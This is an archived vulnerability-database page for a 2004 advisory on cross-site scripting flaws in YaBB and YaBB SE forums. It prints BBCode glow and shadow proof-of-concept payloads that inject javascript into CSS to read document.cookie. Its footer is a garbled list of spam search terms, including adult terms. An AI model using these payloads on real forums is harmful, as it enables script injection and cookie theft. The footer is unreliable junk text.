about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites


Title YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites
Published 2004-03-15-12:00AM
Updated 2004-09-22-01:48PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this issue is credited to Cheng Peng Su <apple_soup@msn.com> this issue was also independently discovered by frog-m@n.
Vulnerable  YaBB SE YaBB SE 1.5.1
YaBB SE Simple Machines SMF 1.0 b
YaBB YaBB 1 Gold SP 1.3
Not Vulnerable  YaBB YaBB 1 Gold - SP 1.3.2
Code   No exploit is required to leverage this issue. The following proof of concept has been provided:

[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

The following proof of concept has been supplied by frog-m@n:
[glow=red,2);background:url(javascript:[SCRIPT],300]text[/glow]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 22:00:08 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sex arab v www.wrold. nude image was guckst 20216 news for c pussypictu sexivi www..sex t www.hr911. www.Africa fotoplenka news for c www.webziy Mafia+Blog Adultfun met-art.co www.Tamila kambi 98/ xx flim tv www.porno guest book apache+2.2 /search/ex weather.co Useable re phpkit 1.6 Layla Falc components hindi part CMS is Fre hot asian www.wapbu. tamil sex www.trish local root havas Crack Data junsai.com izicontent all cartoo p...252Fi? ass crunch auri aoi www.bzdyfc news for C SEXCOLEGIA sab Wap.phoner